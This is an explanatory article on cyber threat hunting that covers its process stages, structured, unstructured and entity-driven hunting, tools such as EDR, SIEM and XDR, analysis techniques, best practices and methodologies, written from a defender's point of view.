What is threat hunting?

Threat hunting matters because many advanced persistent threats (APTs) evade standard detection systems. Successful APT infiltration enables attackers to monitor network activity over months or years. Attackers can move laterally throughout network assets, gather credentials, and identify targets for data breaches. Threat hunting is a complementary capability that works alongside preventive/detective controls and incident response to find threats that evade existing defenses.

How does threat hunting work?

Threat hunting generally supplements automated threat detection systems, adding a human element to cybersecurity setups. It involves human-driven analysis of vast amounts of security data (including logs, network traffic, and endpoint activity) to uncover sophisticated adversaries.

Threat hunters are skilled analysts who work within an organization's security team or via third-party security partners. Analysts consider each potential attack based on intelligence, trends, or anomalous patterns. They then meticulously investigate this hypothesis across the organization's digital environment.

The key takeaway is that hunters do not wait for alerts. They proactively seek evidence of compromise and escalate confirmed findings to incident response for containment and eradication.

Steps in the threat hunting process

Threat hunting takes many forms, depending on the nature of the organization and the threats it faces. However, threat hunting methods tend to rest on a consistent series of steps. Stages in the threat hunting process include:

1. Initial triggers

Threat hunting expeditions begin following a trigger event or discovery. For example, security analysts may note an emerging threat based on remote access protocols or novel rootkits that use fileless malware to escape firewalls. Threat intelligence may point towards ongoing phishing attacks, while research partners may highlight new threat actors and their TTPs.

Analysts use triggers to identify areas of focus. Threat hunters analyze specific network components or applications to identify malicious activity. Triggers can be theoretical (based on hypotheses) or material (based on immediate, specific threats).

2. Investigation

Investigations take a deep dive into potential attacks. Tools like endpoint detection and response (EDR) provide visibility into endpoints and other network components. Analysts can monitor network connections, file transfers, user logins, and registry changes to assess and neutralize attacks.

This phase continues until hypotheses are validated and findings documented, after which incident response handles containment and recovery.

3. Mitigation

The final stage is to report and hand off findings to incident response, which performs containment, eradication, and recovery to restore normal operations. Threat hunters compile comprehensive reports for security teams and other stakeholders. Reports indicate necessary security actions and contribute to ongoing security monitoring.

Threat hunters do not just feed information to technicians or managers. They build databases of past and current threats. This information details the nature and motivations of attackers, allowing organizations to improve their security posture and prevent future incidents.

Types of cyber threat hunting

In broad terms, cybersecurity threat hunting can be structured or unstructured. Organizations may take a two-pronged approach, incorporating both variants, or focus on one method to achieve their security goals.

Structured hunting

Structured hunting is intelligence-led and follows a predefined framework. Threat hunters start with a trigger derived from threat intelligence, such as a new adversary tactic (TTP). Hunters then systematically query security data across their network environment to detect the presence of that specific activity.

Structured hunting works well when dealing with known threats. Threat hunters start by comparing publicly known threat data with network activity. This method is less effective when handling unknown or complex threats.

However, structured approaches are consistent and accessible. Organizations can leverage public frameworks like MITRE ATT&CK to identify urgent threats and TTPs. Security teams are less reliant on sophisticated internal monitoring systems.

Unstructured hunting

Unstructured hunting is a more exploratory approach. Anomalies or indicators trigger investigations. For instance, a suspicious log entry may trigger an internal alert. Threat-hunting teams may also note a new malware hash on intelligence databases.

Threat hunters may not have a specific threat actor or technique in mind. Instead, unstructured hunting techniques use triggers as clues. This approach often uncovers hidden and persistent threats that structured hunting misses.

Entity-driven threat hunting

There is also a third form of threat hunting to consider. This type of threat hunting prioritizes high-value and high-risk assets. Security teams search for threats connected to that "entity". For example, analysts may focus on the accounts of executives or administrators, or data containers holding private health information.

Threat hunting tools and techniques

Threat hunters rely on a set of security tools and techniques to direct their efforts, investigate threats, and ensure effective responses.

Threat hunting tools

• Endpoint detection and response (EDR): EDR tools gather security data continuously, allowing threat hunters to look for evidence such as process executions or suspicious connections that evade automated security controls.
• Security Information and Event Management (SIEM): SIEM tools create logs of user actions and network events. Log data allows threat hunters to assess longer-term patterns and match network data with external intelligence about threat behavior.
• Extended detection and response (XDR): XDR goes beyond EDR. It provides threat hunting teams with visibility over internal events such as lateral movement between network assets. XDR also unifies data from endpoints, apps, and cloud platforms, making it easier to correlate indicators across the network environment.
• Behavioral monitoring tools: Specialized monitoring tools compare network activity against baselines to detect suspicious patterns. This generates high-quality leads for investigators to follow.

Threat hunting techniques

• Searches: Simple queries allow threat hunters to match specific indicators and develop data sets for further analysis.
• IOC sweeping: Extends simple searching by "sweeping" the network environment for indicators of compromise.
• Cluster analysis: Analysts sort data into logically related clusters. For example, traffic flows and login attempts may exhibit similar behavior, potentially indicating a coordinated attack.
• Grouping: Analysts create groups containing similar evidence points. For instance, groups could contain all active IP addresses on the network. Groups are generally derived from clusters formed from data flagged as suspicious. This reduces false positives and focuses on high-probability threats.
• Stack counting: Threat hunters analyze the frequency of network events to generate baselines, then use this data to detect outliers. This is a primitive form of behavior analysis that often provides early warning of embedded threats.
• Anomaly detection: Machine learning algorithms maintain dynamic baselines and continuously model "normal" behavior against network activity.
• Principal Component Analysis (PCA): Reduces noise in large data sets by focusing on the most significant indicators of malicious activity.
• Deception: Threat hunters proactively lure attackers to expose their activities. For example, fake files or credentials function as honeytokens that only attackers are likely to access.

Best practices of cyber threat hunting

Threat hunting is a powerful addition to an organization's security posture. However, inefficient hunting is both expensive and deceptive. It may allow threats to thrive below the surface. The best practices below will help you implement threat hunting effectively and safely.

• Understand critical assets: Identify data containers, applications, and user accounts that are most vulnerable to advanced threats. Hunt threats that affect high-risk assets to avoid wasting resources on low-value targets.
• Create reliable activity baselines: Use automated tools to create accurate user and network activity baselines.
• Gather security data widely: Employ EDR, SIEM, and XDR (where possible) to cover all endpoints and internal network assets. Aggregate real-time monitoring with logs to capture maximum information about hidden threats.
• Leverage threat intelligence: Effective threat hunting relies on external intelligence. Combine internal data collection with intel about current threat actors and TTPs.
• Use intelligence to develop relevant hypotheses: A hypothesis-driven framework works well when detecting specific advanced threats. Identify high-risk threats based on open source databases like MITRE ATT&CK or third-party services.
• Automate threat detection tasks: Automation and machine learning tools reduce the workload for threat hunting teams. Leave IOC scanning and correlation to automated tools and focus human eyes on active investigations.
• Upskill internal teams to master threat hunting: Internal security teams may not be ready to deploy proactive threat hunting. Train team members in behavior analysis, using threat intelligence, forensic investigation, and using EDR or SIEM tools.
• Learn from threat hunting outcomes: Investigations and analysis should feed into a process of continual improvement. Use outcomes to refine detection rules, reduce false positives, and cut metrics like dwell time or time-to-respond. Annual threat hunting audits should assess performance and suggest improvements.

Threat hunting methodologies

Methodologies are specific threat hunting models. Organizations can deploy three main threat hunting methodologies, with different levels of sophistication and capabilities:

• Hypothesis-based threat hunting: Organizations search crowdsourced intelligence of emerging and active threats. Security teams assess tactics, techniques, and procedures (TTPs) to identify relevant threats that may affect their networks. Threat hunters then use behavior analysis tools to determine whether known TTPs are present in their network setting.
• Indicators of compromise or attack: This methodology draws on a wider pool of intelligence data. Analysts refer to tactical threat intelligence to detect and identify attacks. For example, IOCs include multiple failed logins or unusual file transfer patterns. IOAs include suspicious port activity and command executions. Analysts combine IOCs and IOAs with threat intelligence to enrich their incident response process and identify attack types.
• Machine Learning and AI-based analytics: Next-generation threat hunting uses ML and artificial intelligence to analyze vast quantities of network data. Analytic tools search for behavioral anomalies that indicate active attacks, including the well-hidden footprints of APTs. Human analysts take over when tools generate alerts, enabling in-depth triage and extended threat hunting.

Why does your organization need a threat hunting strategy?

Threat hunting has clear advantages in today's cybersecurity landscape. Advanced threats pose a critical risk to modern organizations and often evade conventional security tools. Threat hunting responds to this security vulnerability by proactively seeking, identifying, and neutralizing active threats before they cause harm.

Threat hunting is a core component of a modern security strategy that builds resilience and reduces business risk. With reactive security measures failing, proactive techniques are becoming essential.